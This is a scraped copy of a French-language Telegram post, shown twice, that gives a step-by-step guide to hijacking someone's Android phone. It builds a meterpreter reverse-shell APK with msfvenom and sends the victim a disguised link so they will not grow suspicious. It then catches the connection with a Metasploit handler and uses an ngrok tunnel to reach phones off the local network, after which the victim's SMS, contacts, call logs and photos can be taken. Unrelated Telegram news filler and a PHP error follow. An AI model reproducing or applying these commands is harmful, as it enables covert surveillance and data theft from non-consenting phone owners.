Telegram Group & Telegram Channel
🔰 Avoir accès à un téléphone grâce à metasploit 🔰

🎯 Metasploit est disponible sur Kali , Ubuntu et aussi sur Windows

Les amoureux de termux peuvent l'utiliser aussi

Dans mon car j'utilise Kali linux

Pour commencer ouvrir votre terminal et taper 👇

#msfvenom -p android/meterpreter/reverse_tcp LHOST=”Votre Adresse IP” LPORT=4444 R /root/Bureau/android.apk

Pour connaître son IP :
ifconfig

Un fois le Payload généré envoyer le juste à votre vitime ou vous pouvez l'introduire dans votre serveur et envoyé ça à votre vitime sous forme d'un lien avec la commande :
# cp /root/Bureau/android.apk /var/www/html

Ensuite démarré votre service apache2

Ensuite envoyer le lien à votre vitime : votre IP/android.apk

Vous pouvez toute fois modifier le lien pour que ça soit jolie que ça juste pour ne pas éveiller les soupçons

🎯Démarrage de Métasploit

Maintenant aller dans votre terminal ou ouvrir d'autres fenêtre et taper 👇

# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST Votre Adresse IP
# set LPORT 4444
# exploit

Maintenant vous avez accès au téléphone de votre vitime

Pour se déplacer dans le dossier Download du Téléphone de la cible taper 👇
# cd /sdcard/Download
Vous pouvez faire beaucoup de truc du genre avoir tous les SMS , contact , les appels effectuer , les photos et aussi télécharger des trucs sur le téléphone vitime .. etc

NB: votre vitime doit être sur le même réseau que vous dans le cas contraire vous devez utiliser un tunnel comme ngrok

Pour ce faire aller télécharger ngrok puis l'installer (aller sur Google) ensuite taper dans votre terminal 👇
# ./ngrok tcp 4444
Maintenant il suffit juste de remplacer votre IP par : 0.tcp.ngrok.oi et le port par : 18728 comme sur la photo et Boom 💥

Mon Télégramme :@Re_dexx



group-telegram.com/ethical_hackingr/417
Create:
Last Update:

🔰 Avoir accès à un téléphone grâce à metasploit 🔰

🎯 Metasploit est disponible sur Kali , Ubuntu et aussi sur Windows

Les amoureux de termux peuvent l'utiliser aussi

Dans mon car j'utilise Kali linux

Pour commencer ouvrir votre terminal et taper 👇

#msfvenom -p android/meterpreter/reverse_tcp LHOST=”Votre Adresse IP” LPORT=4444 R /root/Bureau/android.apk

Pour connaître son IP :
ifconfig

Un fois le Payload généré envoyer le juste à votre vitime ou vous pouvez l'introduire dans votre serveur et envoyé ça à votre vitime sous forme d'un lien avec la commande :
# cp /root/Bureau/android.apk /var/www/html

Ensuite démarré votre service apache2

Ensuite envoyer le lien à votre vitime : votre IP/android.apk

Vous pouvez toute fois modifier le lien pour que ça soit jolie que ça juste pour ne pas éveiller les soupçons

🎯Démarrage de Métasploit

Maintenant aller dans votre terminal ou ouvrir d'autres fenêtre et taper 👇

# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST Votre Adresse IP
# set LPORT 4444
# exploit

Maintenant vous avez accès au téléphone de votre vitime

Pour se déplacer dans le dossier Download du Téléphone de la cible taper 👇
# cd /sdcard/Download
Vous pouvez faire beaucoup de truc du genre avoir tous les SMS , contact , les appels effectuer , les photos et aussi télécharger des trucs sur le téléphone vitime .. etc

NB: votre vitime doit être sur le même réseau que vous dans le cas contraire vous devez utiliser un tunnel comme ngrok

Pour ce faire aller télécharger ngrok puis l'installer (aller sur Google) ensuite taper dans votre terminal 👇
# ./ngrok tcp 4444
Maintenant il suffit juste de remplacer votre IP par : 0.tcp.ngrok.oi et le port par : 18728 comme sur la photo et Boom 💥

Mon Télégramme :@Re_dexx

BY Ethical Hacking teams


Warning: Undefined variable $i in /var/www/group-telegram/post.php on line 260

Share with your friend now:
group-telegram.com/ethical_hackingr/417

View MORE
Open in Telegram


Telegram | DID YOU KNOW?

Date: |

But the Ukraine Crisis Media Center's Tsekhanovska points out that communications are often down in zones most affected by the war, making this sort of cross-referencing a luxury many cannot afford. The Securities and Exchange Board of India (Sebi) had carried out a similar exercise in 2017 in a matter related to circulation of messages through WhatsApp. Groups are also not fully encrypted, end-to-end. This includes private groups. Private groups cannot be seen by other Telegram users, but Telegram itself can see the groups and all of the communications that you have in them. All of the same risks and warnings about channels can be applied to groups. The message was not authentic, with the real Zelenskiy soon denying the claim on his official Telegram channel, but the incident highlighted a major problem: disinformation quickly spreads unchecked on the encrypted app. In view of this, the regulator has cautioned investors not to rely on such investment tips / advice received through social media platforms. It has also said investors should exercise utmost caution while taking investment decisions while dealing in the securities market.
from us


Telegram Ethical Hacking teams
FROM American